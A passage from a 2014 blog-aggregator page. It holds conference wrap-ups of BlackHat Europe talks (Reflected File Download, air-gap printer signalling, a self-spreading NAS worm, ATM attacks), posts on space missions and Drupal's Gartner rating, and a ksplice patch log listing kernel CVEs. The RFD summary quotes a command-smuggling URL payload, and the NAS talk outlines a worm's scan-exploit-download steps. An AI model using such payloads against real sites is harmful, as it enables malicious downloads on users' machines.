They analysed the changes implemented by Apple in its new version of their operating system and found some findings. They started with a review of the rubilyn root-kit publicly released 2 years ago. Then they reviewed how to installed (offensive) and detect (defensive) a root-kit on the new version of OS X. A good idea was to present all the examples (system calls) with their Windows version (most people have more knowledge of the Microsoft environment). The talk was very technical and above my knowledge, very difficult to follow but, according to a friend, it was good. Finally, they presented their tool called SSV-X (“System Virginity Verifier”), especially adapted to OS X.

And the second day finished for me with “Reflected file download – A new web attack vector” by Oren Hafif. After a funny introduction about himself, Oren explained in details what is RFD and what is behind this attack. The presentation focused on the objectives of RFD, understanding how it works. Both defenders and attackers are impacted: how to detect and report but how to prevent. calc;exe:

calc.exe, the security researcher's best friend

calc.exe, the security researcher’s best friend

The attack is quite straight forward: A user clicks on a valid link, a malicious file got downloaded from google.com, the file executes immediately once clicked. The key in this attack is: how do we trust downloads and how do we trust websites? As example, we trust online banks websites because that have a lot of locks on the page, they use HTTPS, the url bar is green, etc… Four out of five people will trust a download based on the domain! Based on the Google autocomplete feature, Oren explained step by step how this attack works. Starting from a simple ‘rfd‘ search string up to a ‘s;.setup.bat/?q=rfd”||calc||‘. This attack also abuse of stupid browsers behaviour which allows files containing “install”, “setup” or “update” in the filename! An advanced attack could be to use Powershell to download the rest of the payload. It will ask for admin rights but using the standard dialog box that people trust of course! Finally, Oren reviewed some ways to fix this issue:

In the mean time, Google fixed the issue but, according to Oren, there are tons of vulnerable websites online! Very nice presentation which, I’m sure, gave lot of ideas to the pentesters present in the room!

Next to the classic briefings, there was also an Arsenal session organized by Netpeas and Toolswatch with very interesting tools. Don’t hesitate to have a look at them:

That’s it for this edition of BlackHat! I only attached 25% of the scheduled talks and, in my selection, some were excellent, other less but a broad scope was covered. Two remarks about the organization: change your WiFi and catering providers ;-)

Game over!

Game over!

 

by Xavier at October 17, 2014 08:27 PM

October 16, 2014

Paul Cobbaut

space

It takes a small effort to keep up to date on space news. Here's a summary of some current space flights that I like.


New Horizons
In 2015 we will see Pluto (a dwarf planet) for the very first time. This is the best picture we have of Pluto today:

New Horizons should improve this picture gradually from February to August 2015, yeah!

Dawn
Remember Ceres, the dwarf planet between Mars and Jupiter. Only 900km accross, yet it could have more fresh water than planet Earth, and it holds about a third of the mass of the Asteroid belt. Dawn will give us a first look at Ceres in February 2015, yeah!


China to the Moon
Many people laugh with the Chinese space program, they shouldn't! They launched Chang'e 3 to the Moon in December 2013, and released a rover that is still operational today. Never mind that it stopped driving in January 2014, having a bunch of instruments operate for more than 10 months at -150 and +100 degrees Celcius is *amazing*.
Chang'e 4 will launch 23 October 2014 to fly to the Moon and back, testing return to Earth. Chang'e 5 will collect some rocks from the Moon in 2015 and fly them back to Earth. How long will it take before they send people ?
My guess is they won't just plant a flag, they will go to the Moon to do real long term science.


Elon Musk
Elon Musk is a man with a clear vision. He wants to put a million people on Mars as soon as possible. He is currently in charge of SpaceX (and also CEO of Tesla). They already had four or five flights to the International Space Station with their own rockets and their own spacecraft. My best guess is that they will have an unmanned Mars landing in about six years, and manned around 2025-ish.


There is more:
-Rosetta (circling a comet!) with Philae
-Juno

-the Chinese space station (construction from 2018 till 2022-ish)
-the American rovers on Mars
-lot's of satellites around Mars
-and the Voyager probes are still alive






by Paul Cobbaut (noreply@blogger.com) at October 16, 2014 06:37 PM

Xavier Mertens

BlackHat Europe 2014 Wrap-Up Day #1

BlackHat EuropeBlackHat is back in Amsterdam and here is my wrap-up for the first day. It rained all my way to Amsterdam this morning but it will not prevent motivated people to join the Amsterdam RAI where is organised this 2014 edition of BlackHat Europe! They moved from the center of the city to a bigger conference center. Nice place, but far away from bars and restaurants. After the classic registration process and a nice breakfast, let’s go with today’s talks. As usual, Jeff Moss opened the conference with some facts about the event. Interesting: this year 50% of the audience is coming for the first time! Fresh blood is always good. People came from 68 different countries (eg Brazil, Surinam, Ukraine,..). Jeff’s message was also: feel free to ask questions, participate and learn… The community is very important.

The day started with the Adi Shamir’s keynote and some crypto. Ouch, crypto is hard to start a day but, after some theory, funny stuff was explained. Adi is currently the Borman Professor of Applied Mathematics at the Weizmann Institute of Science and his main area of research is cryptography. He is a co-inventor of the RSA algorithm. To resume, he’s the “S” of RSA!

Adi on stage

Adi on stage

Today, writing paper about mathematical cryptanalysis is getting easier because we have many more targets to attack and more tools. But the definition of success also changed: it’s not only finding the secret key but comparing output of a system with garbage. On the other side, it’s also getting harder to get a practical impact: mathematical attacks had forced practitioners to dump cyphers. For years, we faced examples of attacks against crypto: DES, WEP, MD5/SHA1, etc… Then Adi came back to one of the simplest side-channel attack: power analysis. The goal is to check the fluctuations of power consumed by a device when it performs crypto operations. Can we use this technic to break the RSA scheme? Can we compare curves when coing mathematical operations and compare them. A paper was published at crypto2014: RSA key extraction by listening to computer. The question which then comes is how effective are tempest protections? Adi started to work on a new research: long range bi-directional communication with an air gapped computer system containing only untempered hardware. I played with this for the last few weeks. Imagine a nice building (pentagone) with many secrets. B. Schneier suggested to use an air-gap to protect from NSA. Really? First, the hardware solution is to install a mini-transmitter to the device. This requires just a one-time access to the device. Simple but very intrusive! And what about a software solution? In this case, again we need a one time access to the machine to plant a malware (via a USB stick, a phishing campaign, …). But once done, how to “talk” to the planted malware? That’s the “holy grail” of cyber-attacks: How to communicate with this device in an inaccessible location, let’s say 1200m away from the target. Challenge accepted by Adi! Using a simple scanner/printer and one flash light, Adi explained how we can send data to the printer by flashing the lights with specific sequences. The next step was to test the same from far away with a lazer. Adi wrote an application to program the laser to send messages. A possible attack scenario is the following: a malware initiate a scan at a certain time, get the scanned image and interpret it. But this can be very suspicious. Otherwise, let the victim scan a real document and use the lines from the edges! But what about ex-filtration of data? How to use the printer in the reserver direction? The attacker can pick up the scanning light emanating at night from the dark room. This is very slow. To improve the view to the printer, Adi used a drone to record lights from a higher position. In conclusion, they called the new technique “SCANGATE“. Take care of your all-in-one printers and a as  countermeasures, use black curtains or put the devices away from any external lights. This was a very nice keynote but practically the scenario is very difficult to implement in the real life but it makes you realize that attackers can have plenty of ideas!

BlackHat being a four-tracks conference, it is mandatory to make choices amongst the huge amount of interesting talks. The first one for me was a talks about Network Attached Storage (NAS) systems: “N.A.S.TY Systems that store network accessible shells” presented by Jacob Holcomb. A scaring fact to start: 100% of systems tested were vulnerable…And recently, Qnap was found to be vulnerable to shellshock. Jacob’s proof-of-concept was to develop a self-replicating code across devices. Many people / companies use NAS, so the attack surface is very big. Some key players: QNAP, Seagate, Netgear, D-Link, Buffalo. Classic configuration services are telnet, ssh, http but they also have an unnecessary service: a link to the “cloud”. 50% can be compromised without authentication and 22 CVE numbers were assigned by MITRE. Far worse than routers!

Jacob on stage

Jacob on stage

The testing methodology used by Jacob was classic: scanning, banner grabbing. investigating running services, analysing web applications, static code analysis and fuzzing. Different type of vulnerabilities were discovered: command injection, XSS, buffer overflow, lack of access control, info disclosure, backdoor, broken session management. Jacob gave some tips (countermeasures) for developers like to use the available API instead of calling system(). If you don’t have an alternative, just allow expected commands, nothing else!

What about a mass e exploitation Jacob performed a demo of his N.A.S.Ty worm… He focused on 3 targets: D-LINK DNS345 – TRENDnet  TN-200 / TN-2011T1 and WD MyCloud EX4 but others may be vulnerable too! How does it work?

  1. Scan for tcp/80
  2. Fingerprint
  3. Exploit
  4. Download & run the code
  5. Rinse and repeat

Jacob did a life demo of his worm against NAS located in the room. Once the worm infected a NAS, it kills itself and start scanning for other victimes from the newly infected NAS. Note that it does not check if the NAS is already infected. This means that more worms can run simultaneously and make some kind of DoS (slow response, bandwidth usage). A special mention to the project “hack routers and get paid” (see sohopelesslybroken.com. What about the remediation? For the vendors: transparent patch management, add security checks, apply security principles (like least privileges). For consumers: harden your devices! The worm part was interesting but we already knew that devices like NAS’s have a very weak security maturity!

After a first coffee break, my heart was balancing between SmartMeters and the “Internet of Things” stuff. As I already attended presentations about SmartMeters in the past, I decided to follow Candid Wueest’s talk, called “Quantified self – A path to self-enlightenment or just a security nightmare”. Candid started with a definition of “quantified self”. Is it a new buzzword? The goal of those technologies is to record everything about your life (sleep cycles, calories, steps, heart beats etc…) .

Candid on stage

Candid on stage

Candid put some focus on fitness devices like the Fitbit wristband. This device records information via sensors and share them with a computer (or mobile device). Data are also sent to the cloud to perform interesting statistics and share the data with the user’s friends. Basically, if we introduce more data moves, we also increase the risks. (device, laptop/phone and finally cloud). The first issue reported by Candid was the unintentional data leak or the secret life of mobile applications. Amongst the different apps that were tests, they contacted in average 5 different domains and the winner contacted 14! Connections are used to exchange data with advertisement networks, the application provider, the OS provider, some social medias, etc. Always verify the default settings of your application. A bad example if Fitbit which add once the “sexual activity” visible to all by default! Then, passive information can also be leaked. If a publicity is displayed after the completion of an exercise, the traffic to the advertisement network can be used to detect when the user is doing some exercises. Health kits may contain PII (“Personal Identifiable Information”) but 52% of the tested apps do not have a privacy policy. Your data are already analysed today. Candid gave the example of the earthquake in San Francisco where who was asleep at this time was analysed. Worse, 20% of tested apps send HTTP POST requests in clear text. And, if they use SSL, they accept self-signed certificates and don’t check revocation lists. Some cloud applications are also very bad. Some allow users enumeration (“GET /api/user/xxx”) others implement open relay via sendmail.php. The next part of talk was dedicated to devices using the Bluetooth low energy. It’s possible to scan for interesting devices and learn some information. As a proof-of-concept, Candid developed a “Blueberry Pi” based on a Raspberry, a USB4 dongle and a portable battery. When scanning sport events, you can collect plenty of data. He also scanned the BlackHat attendees but detected only 8 devices. The conclusion of this research? Your digital footprint will be (is already?) everywhere. Tale care when using health devices, when not used, turn off Bluetooth or the device itself, keep them updated (which is also a challenge). Look for a vendor with a security policy. This was a nice talk with a different approach of the Internet of Things.

Next to the lunch, Dan Koretsky talked about VDI (“Virtual Desktop Infrastructure”) with a presentation called “A practical attack against VDI solutions” and with more focus on mobile VDI solutions. What is VDI? The technology allows the user to have a remote desktop on any device: with three big advantages:

What are the threats with mobile VDI solutions? The first threat is directly related to “mRat” or “Mobile Remote Access Trojan” which record keys (key-logger). With the help of Checkpoint, lot of traffic was analysed and some interesting stats grabbed:

Compromised mobile devices stats

Compromised mobile devices stats

The second threat is to grab credentials locally on Android. The third one is screen scrapping. This can be done using an access to the clipboard (CTRL-A then CTRL-C) or screen recording. Finally, the fourth threat is playing a MitM attack. Nothing fancy in this presentation, nothing new, we already know that a solution like VDI is good as long as the end-point is not c compromised Finally, the last five minutes were more marketing with details about the solution developed by Dan’s company.

In a short presentation, Sergej Schumilo and Ralf Spennenberg presented their research called “Don’t trust your USB” or how to find bugs in USB device drivers? Do you remember Teensy? This small USB device was able to compromise a device by simulating a keyboard and sending keystrokes to the victim. But what’s the new motivation? To compromise a system via the USB bus. This research was done using massive usage of virtual machines with systematic and comprehensive fuzzing. The talk explained how to perform this task at a very high performance rate.

My next choice was “How I hacked your ATM with friend’s Raspberry Pi” presented by Alexey Osipov and Olga Kochtova. The topic looked interesting with a new way to use a Raspberry Pi computer. The presentation started with a small history of ATM’s. Did you know that the first ATM was installed in 1967 by Barclay’s bank? If at the beginning it was not seen as a revolution, today, we could not live without an ATM close to us to get some cash! That’s also why ATM’s are nice targets: they contain money.

Alexey & Olga on stage

Alexey & Olga on stage

Then the speakers explained their motivations behind this research? Banks are curious! Usually, the attack scenario starts with a malware injected into the ATM thanks to a physical access. It is injected using an USB stick or a CDROM. The most know attack is the one performed by Barnaby JackATM Jackpotting”. They are also physical attacks (skimmers and pin readers). But, how hard is it to get inside an ATM? The ATM has two major zones: a “service” zone where maintenance can be performed and where the computer is installed and the “safe” zone where is stored the money. Usually, the service zone is protected by a plastic cover with a single lock. The safe zone is made of steel and concrete with rotary code or electronic locks and two types of locks. The next part of the talk was a description of the attack using a Raspberry Pi connected to the computer and remotely accessible. Once access to the ATM, a Raspberry can be installed connected to the USB bus (+ battery + wifi). They briefly explained how the attack was performed but with not many details. The presentation made during the OWASP Belgium chapter in May was much more complete! Conclusion of this talk: The service zone is important and must be properly secured, current methods of protection is not enough. Here again, nothing brand new…

If I was a bit disappointed by the presentation that I followed in the afternoon, the last one of the day was the best one (IMHO). The last talk was “Firmware.RE – Firmware unpacking, analysis and vulnerability discovery as a service” by Jonas Zaddach.

Jonas on stage

Jonas on stage

The idea of this research started with another fact: Embedded systems are everywhere! They can do a lot of things but it’s even more funny to make them talk to each others and even more to the Internet! (IoT). The classic type of embedded systems are routers, printers or VoIP systems. Jonas reviewed some nightmare stories (backdoors for routers and abusing PostScript with printers). And many many other devices… The problem is that analysis all those devices requires a lot of time. This can’t be performed  manually. The idea of the research was to make a large scale analysis to see if embedded systems suffer of the same vulnerabilities. But the problems with large scale analysis are:

How to automate this?

The big advantage is that the analysis is non intrusive, it can be performed online and it is very scalable but mainly challenges remain! The first challenge is how to get the firmware? They are multiple sources and ways to get them. There was no large scale firmware datasets available. They downloaded lot of firmwares but some of them were not available. The second challenge was the firmware identification: How to detect firmware across thousands of files? How to reliability unpack and learn formats? Example: upgrade a printer via a PS file, how to detect it as a firmware? The architecture they developed is based on a crawler which downloads and stores firmware in a db. The firmware is sent to the cloud application for analysis (unpack, static analysis, fuzzy hashing);. A password hash cracker is also available to crack found passwords. Everything is managed by a web interface. As of today, the crawler already collected 759K files (1.8TB) From those files, 1.7M files were extracted! What were the common issues found:

The analysis system will be available to everybody and do not hesitate to submit your firmware. The tool is available at the following address: www.firmware.re (It will be publicly available soon after the conference). The first day was closed by a reception in the business corner where people did some networking. See you tomorrow for the second day!

by Xavier at October 16, 2014 05:43 PM

Dries Buytaert

Acquia a leader in Gartner Magic Quadrant for Web Content Management

Topic: 

You might have read that Acquia was named a leader in the Gartner Magic Quadrant for Web Content Management.

It's easy to underestimate the importance of this recognition for Acquia, and by extension for Drupal. If you want to find a good coffee place, you use Yelp. If you want to find a nice hotel in New York, you use TripAdvisor. Similarly, if a CIO wants to spend $250,000 or more on enterprise software, they consult an analyst firm like Gartner. So think of Gartner as "Yelp for the enterprise".

Many companies create their technology shortlist based on the leader quadrant. That means that Drupal has not been considered as an option for hundreds of evaluations for large projects that have taken place in the past couple of years. Being named a leader alongside companies like Adobe, HP, IBM, Oracle, and Sitecore will encourage more organizations to evaluate Drupal. More organizations evaluating Drupal should benefit the Drupal ecosystem and the development of Drupal.

by Dries at October 16, 2014 12:23 PM

October 15, 2014

Wim Coekaerts

Oracle Linux Containers and docker and the magic of ksplice becomes even more exciting

So, in my previous blogs I talked about the value of ksplice for applying updates and keeping your system current. Typical use case has been on physical servers running some application or in a VM running some application and it all keeps every system pretty isolated. Downtime on a single server is often, by a system admin, seen as no big deal, downtime of a bunch of servers because of a multi-tier application that goes down, however, by the application owner is a pretty big deal and can take some scheduling (and cost) to agree on downtime for reboots. If you have to patch a database server and reboot it, then you first have to bring down your application servers, then bring down the database, then reboot the server. So that 'single reboot' from a sysadmin point of view, is a nightmare and long downtime and potential risk for the application owner that has an application across many servers. Do keep that complexity in mind...

Anyway, we introduced support for Linux containers a year ago, back with Oracle Linux 6 and the release of UEKr3, no need to wait for OL7 (or rhel7...) we 've been doing this for almost a year and it was possible without having to reinstall servers and go from 6 to 7 and to systemd and have major changes. Just simply updating an OL6 environment and a reboot into uek3 and you were good to go, a year ago. So... with containers (and docker is very similar here)... you run one kernel. As opposed to running VMs where each VM is a completely isolated virtual environment with their own kernel and you can live migrate the VMs to another host if you need to update/patch the host, etc... So you run an OS that supports containers, you deploy your apps and isolate them nicely in a container each... and now you need to apply kernel security updates... well... that means, the host kernel on which all these containers environments are running... oops. my reboot now brings down a ton of containers. Well, not with ksplice. You run uptrack-update in the main environment and it nicely, online, without affecting your running apps in their containers or docker environments, updates to the latest fixes and CVEs. Done. No downtime, no scheduling issues with your application users... all set.

Supported.. since a year ago. Stable.

by wcoekaer at October 15, 2014 09:27 PM

The magic of ksplice continues...

My previous blog talked about some cool use cases of ksplice and I used Oracle Linux 5 as the example. In this blog entry I just wanted to add Oracle Linux 6 to it. For Oracle Linux 6, we go all the way back to the GA date of OL6. 2.6.32-71.el6 build date Wed Dec 15 12:36:54 EST 2010. And we support ksplice online updates from that point on, up to today. The same model, you can be on any Oracle Linux 6 kernel, an errata update, a specific kernel from an update release like 6.1,... 6.5,... and get current with CVEs and critical fixes from then on. After running uptrack-upgrade, I get to be current : 2.6.32-431.29.2.el6

I ran out of xterm buffer space ;-) so starting with the Installing part of the output of uptrack-upgrade -y :

Installing [1y0hqxq7] Invalid memory access in dynamic debug entry listing.
Installing [1f9nec9b] Clear garbage data on the kernel stack when handling signals.
Installing [lrh0cfph] Reduce usage of reserved percpu memory.
Installing [uo1fmxxr] CVE-2010-2962: Privilege escalation in i915 pread/pwrite ioctls.
Installing [11ofaaud] CVE-2010-3084: Buffer overflow in ETHTOOL_GRXCLSRLALL command.
Installing [8u4favcu] CVE-2010-3301: Privilege escalation in 32-bit syscall entry via ptrace.
Installing [ayk01zir] CVE-2010-3432: Remote denial of service vulnerability in SCTP.
Installing [p1o8wy3o] CVE-2010-3442: Heap corruption vulnerability in ALSA core.
Installing [r1mlwooa] CVE-2010-3705: Remote memory corruption in SCTP HMAC handling.
Installing [584zm6x2] CVE-2010-3904: Local privilege escalation vulnerability in RDS sockets.
Installing [vt03uggp] CVE-2010-2955: Information leak in wireless extensions.
Installing [7rzgltfi] CVE-2010-3079: NULL pointer dereference in ftrace.
Installing [oyaovezn] CVE-2010-3437: Information leak in pktcdvd driver.
Installing [70cjk1y6] CVE-2010-3698: Denial of service vulnerability in KVM host.
Installing [9dm5foy9] CVE-2010-3081: Privilege escalation through stack underflow in compat.
Installing [mhsn7n2j] Memory corruption during KSM swapping.
Installing [kn5l6sh5] KVM guest crashes due to unsupported model-specific registers.
Installing [xmx98rz9] Erroneous merge of block write with block discard request.
Installing [23nlxpse] CVE-2010-2803: Information leak in drm subsystem.
Installing [mo9lbpsi] Memory leak in DRM buffer object LRU list handling.
Installing [91hrmhbr] Memory leak in GEM drm_vma_entry handling.
Installing [apryc0uo] CVE-2010-3865: Integer overflow in RDS rdma page counting.
Installing [ur02tbrc] CVE-2010-4160: Privilege escalation in PPP over L2TP.
Installing [5o3hvdgy] CVE-2010-4263: NULL pointer dereference in igb network driver.
Installing [a3z3nda1] CVE-2010-3477: Information leak in tcf_act_police_dump.
Installing [lsd1hzvx] CVE-2010-3078: Information leak in xfs_ioc_fsgetxattr.
Installing [z92iokkb] CVE-2010-3080: Privilege escalation in ALSA sound system OSS emulation.
Installing [23yh7u1i] CVE-2010-3861: Information leak in ETHTOOL_GRXCLSRLALL ioctl.
Installing [jxtltpyu] CVE-2010-4163 and CVE-2010-4668: Kernel panic in block subsystem.
Installing [5fuyrpx3] CVE-2010-4162: Integer overflow in block I/O subsystem.
Installing [ylkgl75m] CVE-2010-4242: NULL pointer dereference in Bluetooth HCI UART driver.
Installing [ppawlabm] CVE-2010-4248: Race condition in __exit_signal with multithreaded exec.
Installing [q4n7w8t6] CVE-2010-3067: Information leak in sys_io_submit.
Installing [0w2s15ix] CVE-2010-3298: Information leak in hso_get_count().
Installing [dfi8ncbj] CVE-2010-3876: Kernel information leak in packet subsystem.
Installing [ahrdouix] CVE-2010-4073: Kernel information leaks in ipc compat subsystem.
Installing [wvbjfli8] CVE-2010-4074: Information leak in USB Moschip 7720/7840/7820 serial drivers.
Installing [pkhcqtro] CVE-2010-4075: Kernel information leak in serial subsystem.
Installing [cwksn40u] CVE-2010-4077: Kernel information leak in nozomi driver.
Installing [q4d3smds] CVE-2010-4079: Information leak in Conexant cx23415 framebuffer driver.
Installing [z4duwd7q] CVE-2010-4080 and CVE-2010-4081: Information leaks in sound drivers.
Installing [eajqjo74] CVE-2010-4082: Kernel information leak in VIAFB_GET_INFO.
Installing [6hrf2a3e] CVE-2010-4083: Information leak in System V IPC.
Installing [3xm2ly3f] CVE-2010-4158: Kernel information leak in socket filters.
Installing [5y2oasdw] CVE-2010-4525: Information leak in KVM VCPU events ioctl.
Installing [35e4qfr6] CVE-2010-2492: Privilege escalation in eCryptfs.
Installing [rr12rtq3] Data corruption due to bad flags in break_lease and may_open.
Installing [20cz9gp7] Kernel oops in network neighbour update.
Installing [m650djkx] Deadlock on fsync during dm device resize.
Installing [c19gus65] CVE-2010-3880: Logic error in INET_DIAG bytecode auditing.
Installing [3e86rex1] CVE-2010-4249: Local denial of service vulnerability in UNIX sockets.
Installing [cxb3m3ae] CVE-2010-4165: Denial of service in TCP from user MSS.
Installing [dii4wm64] CVE-2010-4169: Use-after-free bug in mprotect system call.
Installing [e465fr49] CVE-2010-4243: Denial of service due to wrong execve memory accounting.
Installing [5s3fe1cn] Mitigate denial of service attacks with large argument lists.
Installing [j8jwyth1] Memory corruption in multipath deactivation queueing.
Installing [5qkkyd5m] Kernel panic in network bonding on ARP receipt.
Installing [f9j8s6u6] Failure to recover NFSv4 client state on server reboot.
Installing [qa379ag5] CVE-2011-0714: Remote denial of service in RPC server sockets.
Installing [12q8wuvd] CVE-2011-0521: Buffer underflow vulnerability in av7110 driver.
Installing [tm68xsph] CVE-2011-0695: Remote denial of service in InfiniBand setup.
Installing [fk2zg5ec] CVE-2010-4656: Buffer overflow in I/O-Warrior USB driver.
Installing [bcfvwcux] CVE-2011-0716: Memory corruption in IGMP bridge snooping.
Installing [smkv0oja] CVE-2011-1478: NULL dereference in GRO with promiscuous mode.
Installing [3eu2kr7i] CVE-2010-3296: Kernel information leak in cxgb driver.
Installing [3skmaxct] CVE-2010-4346: Bypass of mmap_min_addr using install_special_mapping.
Installing [xuxi8p7r] CVE-2010-4648: Ineffective countermeasures in Orinoco wireless driver.
Installing [7npiqvil] CVE-2010-4655: Information leak in ETHTOOL_GREGS ioctl.
Installing [en0luyx8] Denial of service on empty virtio_console write.
Installing [yv0cumoa] Denial of service in r8169 receive queue handling.
Installing [j6vlp89e] Failure of virtio_net device on guest low-memory condition.
Installing [q53j90kj] KVM guest crash due to stale memory on migration.
Installing [ri498cnm] KVM guest crash due to unblocked NMIs on STI instruction.
Installing [tlrgiz2i] CVE-2010-4526: Remote denial of service vulnerability in SCTP.
Installing [9eta98wf] Use-after-free in CIFS session management.
Installing [19wu4xr4] CVE-2011-0712: Buffer overflows in caiaq driver.
Installing [3cxo6wrf] CVE-2011-1079: Denial of service in Bluetooth BNEP.
Installing [kzieu2je] CVE-2011-1080: Information leak in netfilter.
Installing [ekzp14u9] CVE-2010-4258: Failure to revert address limit override after oops.
Installing [jd3cmfll] CVE-2011-0006: Unhandled error condition when adding security rules.
Installing [jk52g3fx] CVE-2010-4649, CVE-2011-1044: Buffer overflow in InfiniBand uverb handling.
Installing [z2ne1xi4] CVE-2011-1013: Signedness error in drm.
Installing [gb4ntots] Cache allocation bug in DCCP.
Installing [pe4f00pm] CVE-2011-1093: NULL pointer dereference in DCCP.
Installing [yypibd1k] CVE-2011-1573: Denial of service in SCTP.
Installing [02al7nxj] CVE-2011-0726: Address space leakage through /proc/pid/stat.
Installing [00ahpz3z] CVE-2011-0711: Information leak in XFS filesystem.
Installing [iczdh30p] CVE-2010-4250: Reference count leak in inotify failure path.
Installing [ea8bohrp] Infinite loop in tty auditing.
Installing [85iuyyyj] Buffer overflow in iptables CLUSTERIP target.
Installing [8o0892h3] CVE-2010-4565: Information leak in Broadcast Manager CAN protocol.
Installing [p3ck0dr6] CVE-2011-1019: Module loading restriction bypass with CAP_NET_ADMIN.
Installing [w8sa7qie] CVE-2011-1016: Privilege escalation in radeon GPU driver.
Installing [aqnhua0z] CVE-2011-1010: Denial of service parsing malformed Mac OS partition tables.
Installing [mla0f8wz] CVE-2011-1082: Denial of service in epoll.
Installing [5dbkxjue] CVE-2011-1090: Denial of service in NFSv4 client.
Installing [4qj7c7qc] CVE-2011-1163: Kernel information leak parsing malformed OSF partition tables.
Installing [3vf1zjzf] CVE-2011-1170, CVE-2011-1171, CVE-2011-1172: Information leaks in netfilter.
Installing [a03rwxbz] CVE-2011-1494, CVE-2011-1495: Privilege escalation in LSI MPT Fusion SAS 2.0 driver.
Installing [7z04dctw] Incorrect interrupt handling on down e1000 interface.
Installing [ep319ryq] CVE-2011-1770: Remote denial of service in DCCP options parsing.
Installing [qp7al6tc] CVE-2010-3858: Denial of service vulnerability with large argument lists.
Installing [85n0mc4q] CVE-2011-1598: Denial of service in CAN/BCM protocol.
Installing [z8t1hsjb] CVE-2011-1748: Denial of service in CAN raw sockets.
Installing [pvtdn3yd] CVE-2011-1767: Incorrect initialization order in ip_gre.
Installing [xughs2jb] CVE-2011-1768: Incorrect initialization order in IP tunnel protocols.
Installing [k6a6bqyr] CVE-2011-2479: Denial of service with transparent hugepages and /dev/zero.
Installing [pmkvbrcc] CVE-2011-1776: Missing boundary checks in EFI partition table parsing.
Installing [pb9pjnnn] CVE-2011-1182: Signal spoofing in rt_sigqueueinfo.
Installing [mnpd8mip] CVE-2011-1593: Missing bounds check in proc filesystem.
Installing [d6vuea6w] CVE-2011-2213: Arbitrary code injection bug in IPv4 subsystem.
Installing [zmfowuqn] CVE-2011-2491: Local denial of service in NLM subsystem.
Installing [402w3brr] CVE-2011-2492: Information leak in bluetooth implementation.
Installing [vi7qxs20] CVE-2011-2497: Buffer overflow in the Bluetooth subsystem.
Installing [ql0oxrhk] CVE-2011-2517: Buffer overflow in nl80211 driver.
Installing [0xcbigxp] CVE-2011-1576: Denial of service with VLAN packets and GRO.
Installing [127f4d1u] CVE-2011-2695: Off-by-one errors in the ext4 filesystem.
Installing [w72wz6f4] CVE-2011-2495: Information leak in /proc/PID/io.
Installing [c8v0sk8t] CVE-2011-1160: Information leak in tpm driver.
Installing [1nt1dahj] CVE-2011-1745, CVE-2011-2022: Privilege escalation in AGP subsystem.
Installing [bxqvqvef] CVE-2011-1746: Integer overflow in agp_allocate_memory.
Installing [d4m9k310] CVE-2011-2484: Denial of service in taskstats subsystem.
Installing [3vlbyy24] CVE-2011-2496: Local denial of service in mremap().
Installing [e0lkqz3i] CVE-2011-2723: Remote denial of service vulnerability in gro.
Installing [99r3sbjg] CVE-2011-2898: Information leak in packet subsystem
Installing [3ev4sw2b] CVE-2011-2918: Denial of service in event overflows in perf.
Installing [ll9j5877] CVE-2011-1833: Information disclosure in eCryptfs.
Installing [ww2gv7iv] CVE-2011-3359: Denial of service in Broadcom 43xx wireless driver.
Installing [9x0ub4l1] CVE-2011-3363: Denial of service in CIFS via malicious DFS referrals.
Installing [ggvpdbug] CVE-2011-3188: Weak TCP sequence number generation.
Installing [z4pt0sai] CVE-2011-1577: Denial of service in GPT partition handling.
Installing [omnzxxxr] CVE-2011-3353: Denial of service in FUSE via FUSE_NOTIFY_INVAL_ENTRY.
Installing [o4xkg2el] CVE-2011-3191: Privilege escalation in CIFS directory reading.
Installing [e2eyyaf9] CVE-2011-1162: Information leak in TPM driver.
Installing [1fmgtd1b] CVE-2011-4326: Denial of service in IPv6 UDP Fragmentation Offload.
Installing [ldjwxwd5] CVE-2011-2699: Predictable IPv6 fragment identification numbers.
Installing [tnhvync5] CVE-2011-2494: Information leak in task/process statistics.
Installing [gi4te905] CVE-2011-3593: Denial of service in VLAN with priority tagged frames.
Installing [h1wiua6s] CVE-2011-4110: Denial of service in kernel key management facilities.
Installing [4yrxpwih] CVE-2011-3638: Disk layout corruption bug in ext4 filesystem.
Installing [gz5jfzi3] CVE-2011-1020: Missing access restrictions in /proc subsystem.
Installing [o31erbbr] CVE-2011-4127: KVM privilege escalation through insufficient validation in SG_IO ioctl.
Installing [yqaa1zsp] Arithmetic overflow in clock source calculations.
Installing [vxfxrncu] CVE-2011-4077: Buffer overflow in xfs_readlink.
Installing [rnvy1bow] CVE-2011-4081: NULL pointer dereference in GHASH cryptographic algorithm.
Installing [5bokjzmm] CVE-2011-4132: Denial of service in Journaling Block Device layer.
Installing [q7t7hls4] CVE-2011-4347: Denial of service in KVM device assignment.
Installing [wmeoffm9] CVE-2011-4622: NULL pointer deference in KVM interval timer emulation.
Installing [gu3picnz] CVE-2012-0038: In-memory corruption in XFS ACL processing.
Installing [v2td9qse] CVE-2012-0045: Denial of service in KVM system call emulation.
Installing [n2xairv0] CVE-2012-0879: Denial of service in CLONE_IO.
Installing [2k2kq44h] Fix crash on discard in the software RAID driver.
Installing [i244mlk5] CVE-2012-1097: NULL pointer dereference in the ptrace subsystem.
Installing [2anjx00z] CVE-2012-1090: Denial of service in the CIFS filesystem reference counting.
Installing [3ujb9j7q] Inode corruption in XFS inode lookup.
Installing [01x2k6jv] Denial of service due to race condition in the scheduler subsystem.
Installing [hfh1ug4u] CVE-2011-4086: Denial of service in journaling block device.
Installing [4wb0i9tz] CVE-2012-1601: Denial of service in KVM VCPU creation.
Installing [aqut3qai] CVE-2012-0044: Integer overflow and memory corruption in DRM CRTC support.
Installing [0zkt2e47] CVE-2012-2123: Privilege escalation when assigning permissions using fcaps.
Installing [pe6u1nwx] CVE-2012-2136: Privilege escalation in TUN/TAP virtual device.
Installing [jqtlake1] CVE-2012-2121: Memory leak in KVM device assignment.
Installing [u6ys5804] CVE-2012-2137: Buffer overflow in KVM MSI routing entry handler.
Installing [lr9cjz2p] CVE-2012-2372: Denial of service in Reliable Datagram Sockets protocol.
Installing [nscqru85] CVE-2012-1179 and CVE-2012-2373: Hugepage denial of service.
Installing [j01o1nco] ext4 filesystem corruption on fallocate.
Installing [p37lmn34] CVE-2012-2745: Denial-of-service in kernel key management.
Installing [alprvnsv] CVE-2012-2744: Remote denial-of-service in IPv6 connection tracking.
Installing [m06ws6vc] Unreliable futexes with read-only shared mappings.
Installing [b7mpy2k1] CVE-2011-1078: Information leak in Bluetooth SCO link driver.
Installing [pywfzhvz] CVE-2012-2384: Integer overflow in i915 execution buffer.
Installing [2ibdnvmo] Livelock due to invalid locking strategy when adding a leap-second.
Installing [oixf5hkj] CVE-2012-2384: Additional fix for integer overflow in i915 execution buffer.
